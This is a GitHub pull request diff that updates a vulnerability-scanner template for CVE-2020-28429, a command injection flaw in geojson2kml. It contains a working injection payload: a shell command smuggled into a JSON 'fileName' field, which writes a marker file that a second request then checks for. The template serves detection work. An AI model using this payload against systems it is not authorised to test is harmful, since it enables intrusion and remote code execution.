Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added CVE-2020-28429 by eeche #10489

Merged
merged 7 commits into from
Aug 29, 2024
Merged

Added CVE-2020-28429 by eeche #10489

Changes from 1 commit
Commits
Show all changes
7 commits
Select commit Hold shift + click to select a range
751ca1b
Added CVE-2024-23163 by eeche
eeche Aug 7, 2024
8cb3cb1
Added CVE-2020-28429 by eeche
eeche Aug 7, 2024
150bf59
updated matchers & variable
ritikchaddha Aug 29, 2024
d9b8778
updated req and matchers
ritikchaddha Aug 29, 2024
6c0e101
lint fix
ritikchaddha Aug 29, 2024
fd01f29
extractor added and metadata update
DhiyaneshGeek Aug 29, 2024
e764f48
minor-update
DhiyaneshGeek Aug 29, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Prev Previous commit
Next Next commit
updated matchers & variable
  • Loading branch information
@ritikchaddha
ritikchaddha authored Aug 29, 2024
commit 150bf59192af04f7bb15923a5e13269ace2d44ab
38 changes: 23 additions & 15 deletions http/cves/2020/CVE-2020-28429.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,20 +2,28 @@

info:
name: geojson2kml - Command Injection
author: eeche, chae1xx1os, persona-twotwo, soonghee2
author: eeche,chae1xx1os,persona-twotwo,soonghee2
severity: critical
description: Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
impact: Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
remediation: Do not use geojson2kml. There is no fixed version for geojson2kml.
description: |
Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
impact: |
Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
remediation: |
Do not use geojson2kml. There is no fixed version for geojson2kml.
reference:

Check failure on line 13 in http/cves/2020/CVE-2020-28429.yaml

View workflow job for this annotation

GitHub Actions / lint 

13:13 [trailing-spaces] trailing spaces
- https://nvd.nist.gov/vuln/detail/CVE-2020-28429
- https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
- https://github.com/advisories/GHSA-w83x-fp72-p9qc
- https://nvd.nist.gov/vuln/detail/CVE-2020-28429
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-28429
tags: cve, cve2020, command-injection, geojson2kml, file-upload, web
metadata:
max-request: 2
tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive

variables:
filename: '{{rand_base(6)}}'

http:
- raw:
Expand All @@ -25,7 +33,7 @@
Content-Type: application/json

{
"fileName": "& echo \"{{randstr}}\" > hacked.txt && ls",
"fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
"geoJsonData": {
"type": "FeatureCollection",
"features": [
Expand All @@ -44,21 +52,21 @@
}

- |
GET /file/hacked.txt HTTP/1.1
GET /file/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
part: body_2
words:
- "{{randstr}}"

- type: word
part: header
part: header_2
words:
- "text/html"
- "text/html"

- type: status
status:
- 200
Loading